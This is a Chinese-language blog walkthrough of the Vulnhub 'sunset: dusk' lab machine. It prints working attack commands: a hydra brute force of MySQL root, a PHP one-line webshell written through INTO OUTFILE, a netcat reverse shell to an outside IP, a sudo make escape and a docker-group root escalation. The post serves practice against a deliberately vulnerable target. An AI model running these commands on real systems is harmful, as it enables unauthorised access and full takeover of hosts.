avatar

我可是会飞的啊

找对象ing

  • 首页
  • ctfs
  • 关于
  • 文件库
  • 留言板
  • 标签
  • 归档
  • 【网课推荐】(红队&二进制)
首页 【Vulnhub】Sunset:dusk--WriteUp

【Vulnhub】Sunset:dusk--WriteUp

Posted 2020年 07月 16日 Updated 2023年 03月 1日
【Vulnhub】Sunset:dusk--WriteUp
By selph
9~11 min read

靶机信息

Name: sunset: dusk
Date release: 1 Dec 2019
Difficulty: Beginner
Task:boot2root

关键知识点、工具:

  • 信息收集
  • Mysql弱口令爆破
  • Mysql写入WebShell
  • WebShell反弹交互式shell
  • sudo滥用提权
  • 利用docker提权

渗透过程:

网络信息:

靶机IP:192.168.2.19

攻击机IP:192.168.2.20

信息收集

nmap -A -T5 192.168.2.19

image-20200716201048409

目标开放21,22,25,80,3306,8080端口。

80端口是apache2默认页面,dirb目录扫描没有收获。

8080端口是个web:

image-20200716201457794

有两张图片可以访问,以及得知了一个php的绝对路径。dirb目录扫描没有收获。

21,22,25端口目前信息还不足以进行相应的尝试。

mysql弱口令爆破

3306可能存在默认账号root的弱口令,使用hydra进行爆破尝试:

hydra -l root -P ../rockyou.txt 192.168.2.19 mysql

image-20200716202954818

mysql弱口令爆破参考资料: https://www.freebuf.com/news/162036.html

运气还不错,root账号密码是password。

mysql写入webshell

现在知道php的绝对路径,还知道mysql的账号密码,那么可以向目标写入webshell。

mysql远程连接:

mysql -h 192.168.2.19 -p3306 -u root -ppassword

mysql远程连接参考资料:https://www.cnblogs.com/gaoBlog/p/13152720.html

image-20200716203730993

写入一句话木马:

select "<?php system($_GET['s3lf']); ?>" into outfile '/var/tmp/selph.php';

由于我当前kali上没装菜刀蚁剑啥的,所以直接写成从GET方法获取命令了

这里不知道为啥,一执行命令就500,这里我把靶机重装了一遍就好了,现在靶机IP为192.168.2.21

通过GET参数执行命令:

image-20200716214702269

反弹shell

nc -c bash 123.207.145.80 443

image-20200716215311321

提权到dusk

cat /etc/passwd

得知用户名:dusk

sudo -l

image-20200716215705148

有三个命令可以免密码使用dusk账号执行:ping,make,sl

可sudo权限滥用命令查询:https://gtfobins.github.io/#

这里的make命令可以用来提权.

sudo -u dusk make -s --eval=$'x:\n\t-'"/bin/sh"

image-20200716230441515

提权到root

在dusk的shell下,不能执行sudo -l.

查看dusk账号信息:

id

image-20200716230610833

docker是使用root权限运行的,dusk在docker组里,那么可以使用docker执行命令来实现提权:

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

alpine是体积超小的docker容器

image-20200716231329213

不知道为啥,python弹的交互shell里面打字都会变成双写(虽然也可以识别)但,只有把命令复制黏贴进去才能不是双写的,希望知道的老哥能够指点一二。

get flag

user flag:

# cat  /home/dusk/user.txt
08ebacf8f4e43f05b8b8b372df24235b

root flag:

image-20200716231729209

渗透测试
靶机渗透
This post is licensed under CC BY 4.0 by the author.
Share

Further Reading

Sep 20, 2021

【Vulnhub】CloudAV

靶机任务介绍:这是一个云反病毒扫描平台,当前是个测试版,你被要求去测试这个程序,并找出漏洞提升权限

Sep 12, 2021

【Vulnhub】Socialnetwork

难度:Medium

Jul 20, 2020

【Vulnhub】Sunset:dawn--WriteUp

靶机信息:<br/> Level:beginners <br/> Task:boot2root

OLDER

【Vulnhub】Sunset:nightfall--WriteUp

NEWER

【Vulnhub】Sunset:dawn--WriteUp

Recently Updated

  • 【置顶】本博客的使用指南&更新计划(2023.3更新)
  • [技能兴鲁2023 决赛 职工组]re-ezalgorithm
  • [Pico CTF 2022]pwn-basic-file-exploit
  • [Pico CTF 2021]pwn-Unsubscriptions Are Free
  • [Pico CTF 2021]pwn-Here's a Libc

Trending Tags

pwn 符号执行 HEVD学习 .NET逆向 病毒分析 CTF 软件安全 《Windows内核编程》 dll注入 树莓派

Contents

©2023 我可是会飞的啊. Some rights reserved.

Using the Halo theme Chirpy